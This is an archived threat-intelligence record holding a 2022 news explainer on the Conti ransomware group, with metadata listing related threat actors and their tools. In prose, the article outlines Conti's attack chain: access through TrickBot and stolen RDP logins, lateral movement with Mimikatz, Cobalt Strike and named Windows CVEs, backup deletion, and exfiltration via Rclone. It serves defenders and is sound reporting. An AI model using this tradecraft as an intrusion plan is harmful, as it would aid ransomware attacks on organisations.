{ "id": "f2f91216-9176-482b-a613-a52d2fce460a", "created_at": "2026-04-06T00:20:06.855014Z", "updated_at": "2026-04-10T13:12:56.74107Z", "deleted_at": null, "sha1_hash": "102d29f38d4640f5bd15adf3022e3fce57e0a216", "title": "Conti ransomware explained: What you need to know about this aggressive criminal group", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 65828, "plain_text": "Conti ransomware explained: What you need to know about this\r\naggressive criminal group\r\nBy Lucian Constantin\r\nPublished: 2022-05-31 · Archived: 2026-04-05 22:44:45 UTC\r\nConti has been one of the most aggressive ransomware operations over the past two years and continues to\r\nvictimize many large companies as well as government, law enforcement and healthcare organizations.\r\nResearchers warn that unlike other ransomware groups that generally care about their reputation, Conti doesn’t\r\nalways deliver on its promises to victims.\r\n“Usually, the more successful ransomware operators put a lot of effort into establishing and maintaining some\r\nsemblance of ‘integrity’ as a way of facilitating ransom payments from victims,” researchers from Palo Alto\r\nNetworks said in an analysis. “They want to establish stellar reputations for ‘customer service’ and for delivering\r\non what they promise—that if you pay a ransom, your files will be decrypted (and they will not appear on a leak\r\nwebsite). Yet in our experience helping clients remediate attacks, Conti has not demonstrated any signs that it\r\ncares about its reputation with would-be victims.”\r\nConti first appeared in late 2019 and has slowly grown to become one of the predominant ransomware-as-a-service (RaaS) operations. It’s believed to have some connections to the Ryuk ransomware, which was run by a\r\nRussian cybercrime group known as Wizard Spider. The US Cybersecurity and Infrastructure Security Agency\r\n(CISA) and the Federal Bureau of Investigation (FBI) said in a recent alert that they observed the use of Conti\r\nransomware in over 400 attacks against US and international organizations. According to cybercrime intelligence\r\nfirm Recorded Future, Conti was the ransomware strain responsible for the second largest number of victims in\r\nSeptember 2021 after LockBit.\r\nConti also operates a little differently than other RaaS groups. Most groups work with partners called affiliates to\r\ncompromise victims and deploy the ransomware program for a percentage of the ransom payments, but Conti is\r\nbelieved to pay a monthly wage to its developers.\r\nThe rebranding of Conti\r\nIn May 2022, security intelligence companies reported that the Conti infrastructure, including its official website,\r\nnegotiation service, chat rooms and messengers were shut down or being reset. Researchers from security firm\r\nAdvIntel believe that the group is shutting down the Conti brand and will likely splinter off into separate teams, a\r\nprocess that began months ago and has accelerated recently.\r\nIt also comes after Conti launched a major ransomware and data leak extortion attack in April that impacted at\r\nleast 27 Costa Rican government organizations causing disruptions in its customs and taxes platforms and\r\nimpacting foreign trade and public payroll payments. This prompted the country’s president Rodrigo Chaves to\r\ndeclare a state of national emergency on May 8.\r\nhttps://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html\r\nPage 1 of 5\n\nChaves called the Conti group terrorists and said there are indications people inside the country are collaborating\r\nwith the group. In response, the Conti attackers claim to have released over 650GB of data taken from Costa\r\nRican government systems after the government refused to pay the $10 million extortion fee. The U.S. State\r\nDepartment put up a reward of $10 million for information related to the identity or location of Conti’s leaders as\r\nwell as $5 million for information leading to the arrest of any Conti co-conspirator from any country.\r\n“This shutdown highlights a simple truth that has been evident for the Conti leadership since early Spring 2022 –\r\nthe group can no longer sufficiently support and obtain extortion,” AdvIntel researchers said in a report. “The\r\nblog’s key and only valid purpose are to leak new datasets, and this operation is now gone. This was not a\r\nspontaneous decision, instead, it was a calculated move, signs of which were evident since late April. Two weeks\r\nago, on May 6, AdvIntel explained that the Conti brand, and not the organization itself, was in the process of the\r\nfinal shutdown. As of May 19, 2022, our exclusive source intelligence confirms that today is Conti’s official date\r\nof death.”\r\nConti also took a significant public relations hit in the cybercrime world when following Russia’s invasion of\r\nUkraine it announced its full support for the Russian government and threatened retaliatory cyber attacks against\r\nthe critical infrastructure of any countries that attacked Russia. Other ransomware groups took the opportunity to\r\ndistance themselves from the conflict and declare their political neutrality. Conti later tried to backtrack and said\r\nin a new message that it doesn’t ally with any government and condemns the war, but the reputational damage was\r\nalready done.\r\nThis was followed by a security researcher leaking tens of thousands of messages from Conti’s chat\r\ncommunication system, giving the infosecurity industry and the whole world a deeper look into how the operation\r\nwas being run.\r\nWhile the Conti brand might indeed be dead, the people connected to it will likely continue to engage in\r\ncybercriminal activities as part of other teams under different names. Some of these spin-off teams have already\r\nexisted inside the Conti group — for example, a data extortion group called KaraKurt or a new ransomware\r\noperation called Black Basta that’s possibly related to Conti.\r\nHow Conti gains initial network access\r\nThe attackers using Conti employ many methods of obtaining access to corporate networks, including buying\r\naccess from other groups that already have such access—the so-called network access brokers. Like Ryuk, Conti\r\noperators have used the TrickBot malware for access, as well as other Trojans such as IcedID. These Trojans are\r\ntypically distributed through spear-phishing emails containing malicious links or Microsoft Word attachments.\r\nStolen or weak Remote Desktop Protocol (RDP) credentials are also a common method of entry into networks for\r\nConti and all ransomware groups. CISA and FBI advisory also mention fake software promoted via search engine\r\noptimization, malware distribution networks like ZLoader, and the exploitation of vulnerabilities in external IT\r\nassets as other common methods of Conti affiliates gaining access. In intrusions investigated by Sophos that\r\nresulted in Conti deployment, the company observed the exploitation of FortiGate firewall appliances running\r\nvulnerable firmware.\r\nhttps://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html\r\nPage 2 of 5\n\nHow Conti moves laterally\r\nOnce inside a company, the hackers use a collection of tools to map the network and expand their access.\r\nResearchers have seen the use of the Cobalt Strike attack framework and a penetration testing tool called Router\r\nScan that can scan for and brute-force web administrative credentials of routers, cameras and network-attached\r\nstorage devices.\r\nThe attackers also launch Kerberos attacks with the goal of obtaining the administrator hash and conducting brute-force attacks. Many groups, including Conti, use common tools such as Windows Sysinternal or Mimikatz to\r\nobtain user hashes and plaintext credentials that enable privilege escalation and lateral movement inside the\r\ndomain.\r\nConti affiliates have also been observed exploiting well-known Windows vulnerabilities inside networks such as\r\nSMB Server (including EternalBlue), PrintNightmare (CVE-2021-34527) in the Windows Print spooler service, or\r\nZerologon (CVE-2020-1472) in Microsoft Active Directory Domain Controller systems.\r\nHow Conti encrypts files and deletes backups\r\nThe Conti attackers don’t deploy the ransomware directly and instead rely on more lightweight loaders that can\r\nevade antivirus detection. The group has used the Cobalt Strike and the Meterpreter (Metasploit) implants, as well\r\nas a loader called getuid to inject the ransomware directly into memory.\r\n“Because the reflective loaders deliver the ransomware payload into memory, never writing the ransomware\r\nbinary to the infected computer’s file system, the attackers eliminate a critical Achilles heel that affects most other\r\nransomware families: There is no artifact of the ransomware left behind for even a diligent malware analyst to\r\ndiscover and study,” researchers from Sophos said in an analysis earlier this year.\r\nThe ransomware also obfuscates its strings and Windows API calls by using hash values instead of API functions\r\nand adding another layer of encryption on top of it. All this is meant to make both automated detection by security\r\nprograms and manual reverse-engineering hard.\r\nAnother interesting aspect of the Conti ransomware is that it supports command line execution parameters that\r\ninstruct it to encrypt either the local disk, a particular network share or even a list of network shares defined in a\r\nfile. “The notable effect of this capability is that it can cause targeted damage in an environment in a method that\r\ncould frustrate incident response activities,” researchers from VMware said in an analysis. “A successful attack\r\nmay have destruction that’s limited to the shares of a server that has no internet capability, but where there is no\r\nevidence of similar destruction elsewhere in the environment. This also has the effect of reducing the overall\r\n‘noise’ of a ransomware attack where hundreds of systems immediately start showing signs of infection. Instead,\r\nthe encryption may not even be noticeable for days, or weeks, later once the data is accessed by a user.”\r\nConti uses the AES-256 algorithm to encrypt files with a public key that’s hard-coded in the ransomware program.\r\nThis means that each binary is specifically crafted for each victim to ensure that victims have a unique key pair. It\r\nalso allows the program to encrypt files even if it’s unable to contact a command-and-control server.\r\nhttps://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html\r\nPage 3 of 5\n\nThe Conti attackers also put a lot of effort into complicating restoration efforts. The malware starts by disabling\r\nand deleting the Windows Volume Shadow copies, but then also iterates through around 160 commands to disable\r\nvarious Windows system services including some associated with third-party backup solutions including Acronis\r\nVSS Provider, Enterprise Client Service, SQLsafe Backup Service, SQLsafe Filter Service, Veeam Backup\r\nCatalog Data Service and AcronisAgent.\r\nData exfiltration for double extortion\r\nAccording to a report from security firm AdvIntel, Conti doesn’t only delete backups, but also leverages the\r\nbackup services to exfiltrate data so they can later blackmail victims with threats of data leaks. “Conti hunts for\r\nVeeam privileged users and services and leverages to access, exfiltrate, remove and encrypt backups to ensure\r\nransomware breaches are un-backupable,” the company’s researchers said. “This way, Conti simultaneously\r\nexfiltrated the data for further victim blackmailing, while leaving the victim with no chances to quickly recover\r\ntheir files as the backups are removed.”\r\nThe Conti attackers have also been observed often using the Rclone open-source utility to upload company data to\r\ncloud-based file hosting services like Mega.\r\nLike most ransomware groups these days, Conti maintains a data leak website where it posts information about\r\nnew victims. The group has recently become annoyed with the fact that its ransom negotiation chats with victims\r\nare being leaked to journalists. This happens because such negotiations happen through a victim-specific\r\n“payment sites” set up by the attackers that are usually included in the ransom notes left to the victims. If the\r\nransom notes are uploaded to services like VirusTotal, malware researchers can find the payment sites and\r\nimplicitly see the communication there between victims and the group.\r\nIn a recent blog post, the group threatened to release the data from any victim it’s negotiating with if the chats are\r\nleaked during the negotiation. This has recently happened after the group compromised Japanese electronics\r\nmanufacturer JVCKenwood. “For instance, yesterday, we have found that our chat with JVCKenwood whom we\r\nhit a week ago got reported to the journalists,” the group wrote. “Despite what is said in the article, the\r\nnegotiations were going in accordance with a normal business operation. However, since the publication happened\r\nin the middle of negotiations it resulted in our decision to terminate the negotiations and publish the data.\r\nJVCKenwood has been already informed. Moreover, this week we have once again spotted screenshots from our\r\nnegotiation chats circulating over social media.”\r\nMoreover, the group warned that if the negotiation chats are leaked after the ransom is paid and the victim’s files\r\nare deleted, it will publish the data stolen from another victim in a form of collective punishment.\r\nHow to mitigate Conti attacks \r\nThe joint FBI and CISA advisory contains general ransomware mitigation advice and additional resources,\r\nincluding recommendations such as using multi-factor authentication for accounts, implementing network\r\nsegmentation and traffic filtering, scanning for software vulnerabilities and keeping software products up to date,\r\nremoving unnecessary applications and applying software execution restrictions and controls, restricting remote\r\nhttps://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html\r\nPage 4 of 5\n\naccess such as RDP and limiting access to resources over the network, auditing and limiting the use of\r\nadministrative accounts and implementing endpoint and detection response tools.\r\nThe advisory also contains a link to a list of Conti Indicators of Compromise (IOCs) and the techniques and\r\nprocedures used by the group are described in the MITRE ATT\u0026CK framework.\r\nSource: https://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.htm\r\nl\r\nhttps://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.csoonline.com/article/3638056/conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html" ], "report_names": [ "conti-ransomware-explained-and-why-its-one-of-the-most-aggressive-criminal-groups.html" ], "threat_actors": [ { "id": "6ad410c7-e291-4327-a54b-281c23f0d4fa", "created_at": "2022-10-25T16:07:24.501468Z", "updated_at": "2026-04-10T02:00:05.013427Z", "deleted_at": null, "main_name": "Karakurt", "aliases": [ "Mushy Scorpius" ], "source_name": "ETDA:Karakurt", "tools": [ "7-Zip", "Agentemis", "AnyDesk", "Cobalt Strike", "CobaltStrike", "FileZilla", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "WinZip", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f276b8a6-73c9-494a-8ab2-13e2f1da4c53", "created_at": "2022-10-25T16:07:24.441133Z", "updated_at": "2026-04-10T02:00:04.993411Z", "deleted_at": null, "main_name": "Achilles", "aliases": [], "source_name": "ETDA:Achilles", "tools": [ "RDP", "Remote Desktop Protocol" ], "source_id": "ETDA", "reports": null }, { "id": "2af9bea3-b43e-4a6d-8dc6-46dad6e3ff24", "created_at": "2022-10-25T16:47:55.853415Z", "updated_at": "2026-04-10T02:00:03.856263Z", "deleted_at": null, "main_name": "GOLD TOMAHAWK", "aliases": [ "Karakurt", "Karakurt Lair", "Karakurt Team" ], "source_name": "Secureworks:GOLD TOMAHAWK", "tools": [ "7-Zip", "AnyDesk", "Mega", "QuickPacket", "Rclone", "SendGB" ], "source_id": "Secureworks", "reports": null }, { "id": "079e3d6e-24ef-42b0-b555-75c288f9efd8", "created_at": "2023-03-04T02:01:54.105946Z", "updated_at": "2026-04-10T02:00:03.359009Z", "deleted_at": null, "main_name": "Karakurt", "aliases": [ "Karakurt Lair" ], "source_name": "MISPGALAXY:Karakurt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434806, "ts_updated_at": 1775826776, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/102d29f38d4640f5bd15adf3022e3fce57e0a216.pdf", "text": "https://archive.orkl.eu/102d29f38d4640f5bd15adf3022e3fce57e0a216.txt", "img": "https://archive.orkl.eu/102d29f38d4640f5bd15adf3022e3fce57e0a216.jpg" } }